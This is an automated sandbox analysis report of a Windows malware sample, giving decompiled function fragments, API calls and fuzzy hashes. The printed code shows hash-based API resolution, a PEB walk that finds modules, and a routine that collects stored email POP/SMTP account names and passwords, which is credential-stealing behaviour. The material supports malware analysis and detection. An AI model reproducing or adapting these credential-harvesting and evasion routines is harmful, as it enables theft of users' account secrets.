                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403B64(WCHAR* _a4) {
                    				int _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                    				_t3 = PathFileExistsW(_a4); // executed
                    				return _t3;
                    			}





                    0x00403b72
                    0x00403b7a
                    0x00403b7d

                    APIs
                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID:
                    • API String ID: 1174141254-0
                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403F9E(void* _a4) {
                    				int _t3;
                    				void* _t4;
                    
                    				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                    				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                    				return _t3;
                    			}





                    0x00403fac
                    0x00403fba
                    0x00403fbe

                    APIs
                    • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
                    • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                    • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                    • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406472(long _a4) {
                    				void* _t3;
                    				void* _t4;
                    
                    				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                    				Sleep(_a4); // executed
                    				return _t3;
                    			}





                    0x0040647f
                    0x00406487
                    0x0040648a

                    APIs
                    • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                    • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                    • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004058EA(char* _a4, char* _a8) {
                    				char* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                    				_t4 = StrStrA(_a4, _a8); // executed
                    				return _t4;
                    			}





                    0x004058f8
                    0x00405903
                    0x00405906

                    APIs
                    • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                    • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                    • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00405924(WCHAR* _a4, WCHAR* _a8) {
                    				WCHAR* _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                    				_t4 = StrStrW(_a4, _a8); // executed
                    				return _t4;
                    			}





                    0x00405932
                    0x0040593d
                    0x00405940

                    APIs
                    • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                    • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                    • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040438F
                    • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                    • VariantInit.OLEAUT32(?), ref: 004043C4
                    • SysAllocString.OLEAUT32(?), ref: 004043CD
                    • VariantInit.OLEAUT32(?), ref: 00404414
                    • SysAllocString.OLEAUT32(?), ref: 00404419
                    • VariantInit.OLEAUT32(?), ref: 00404431
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: InitVariant$AllocString$CreateInitializeInstance
                    • String ID:
                    • API String ID: 1312198159-0
                    • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                    • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                    • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				intOrPtr _v44;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t40;
                    				intOrPtr _t45;
                    				intOrPtr _t47;
                    				void* _t71;
                    				void* _t75;
                    				void* _t77;
                    
                    				_t72 = _a4;
                    				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                    				_t81 = _t71;
                    				if(_t71 != 0) {
                    					_push(__ebx);
                    					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                    					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                    					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                    					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                    					_v8 = _v8 & 0x00000000;
                    					_v20 = _t40;
                    					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                    					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                    					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                    					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                    					_v12 = _v12 & 0x00000000;
                    					_v32 = _t45;
                    					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                    					_t77 = _t75 + 0x50;
                    					_v36 = _t47;
                    					if(_v8 != 0 || _v12 != 0) {
                    						E00405872( *0x49f934, _t71, 1, 0);
                    						E00405872( *0x49f934, _t67, 1, 0);
                    						_t74 = _v16;
                    						E00405872( *0x49f934, _v16, 1, 0);
                    						E00405781( *0x49f934, _v40);
                    						E00405872( *0x49f934, _v20, 1, 0);
                    						_push(_v8);
                    						E00405762(_v16,  *0x49f934, _v24);
                    						E00405872( *0x49f934, _v28, 1, 0);
                    						E00405781( *0x49f934, _v44);
                    						E00405872( *0x49f934, _v32, 1, 0);
                    						_push(_v12);
                    						E00405762(_t74,  *0x49f934, _v36);
                    						_t77 = _t77 + 0x88;
                    					} else {
                    						_t74 = _v16;
                    					}
                    					E0040471C(_t71);
                    					E0040471C(_t67);
                    					E0040471C(_t74);
                    					E0040471C(_v20);
                    					E0040471C(_v24);
                    					E0040471C(_v28);
                    					E0040471C(_v32);
                    					E0040471C(_v36);
                    				}
                    				return 1;
                    			}





















                    0x0040d070
                    0x0040d080
                    0x0040d084
                    0x0040d086
                    0x0040d08c
                    0x0040d0a0
                    0x0040d0ae
                    0x0040d0bd
                    0x0040d0c0
                    0x0040d0c5
                    0x0040d0c9
                    0x0040d0e3
                    0x0040d0f2
                    0x0040d101
                    0x0040d104
                    0x0040d109
                    0x0040d110
                    0x0040d11e
                    0x0040d123
                    0x0040d126
                    0x0040d12d
                    0x0040d145
                    0x0040d154
                    0x0040d15a
                    0x0040d166
                    0x0040d174
                    0x0040d186
                    0x0040d18e
                    0x0040d19a
                    0x0040d1ac
                    0x0040d1ba
                    0x0040d1cc
                    0x0040d1d1
                    0x0040d1dd
                    0x0040d1e2
                    0x0040d1e7
                    0x0040d1e7
                    0x0040d1e7
                    0x0040d1eb
                    0x0040d1f1
                    0x0040d1f7
                    0x0040d1ff
                    0x0040d207
                    0x0040d20f
                    0x0040d217
                    0x0040d21f
                    0x0040d227
                    0x0040d230

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                    • API String ID: 0-2111798378
                    • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                    • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                    • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0040317B(intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr _v12;
                    				void* __ecx;
                    				intOrPtr _t17;
                    				void* _t21;
                    				intOrPtr* _t23;
                    				void* _t26;
                    				void* _t28;
                    				intOrPtr* _t31;
                    				void* _t33;
                    				signed int _t34;
                    
                    				_push(_t25);
                    				_t1 =  &_v8;
                    				 *_t1 = _v8 & 0x00000000;
                    				_t34 =  *_t1;
                    				_v8 =  *[fs:0x30];
                    				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                    				_t31 = _t23;
                    				do {
                    					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                    					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                    					_pop(_t26);
                    					_t35 = _t28;
                    					if(_t28 == 0) {
                    						goto L3;
                    					} else {
                    						E004032EA(_t35, _t28, 0);
                    						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                    						_t33 = _t33 + 0x14;
                    						if(_a4 == _t21) {
                    							_t17 = _v12;
                    						} else {
                    							goto L3;
                    						}
                    					}
                    					L5:
                    					return _t17;
                    					L3:
                    					_t31 =  *_t31;
                    				} while (_t23 != _t31);
                    				_t17 = 0;
                    				goto L5;
                    			}














                    0x0040317f
                    0x00403180
                    0x00403180
                    0x00403180
                    0x0040318d
                    0x00403196
                    0x00403199
                    0x0040319b
                    0x004031a1
                    0x004031a9
                    0x004031ab
                    0x004031ac
                    0x004031ae
                    0x00000000
                    0x004031b0
                    0x004031b3
                    0x004031c2
                    0x004031c7
                    0x004031cd
                    0x004031e0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004031cd
                    0x004031d7
                    0x004031dd
                    0x004031cf
                    0x004031cf
                    0x004031d1
                    0x004031d5
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                    • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                    • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                    Uniqueness

                    Uniqueness Score: -1.00%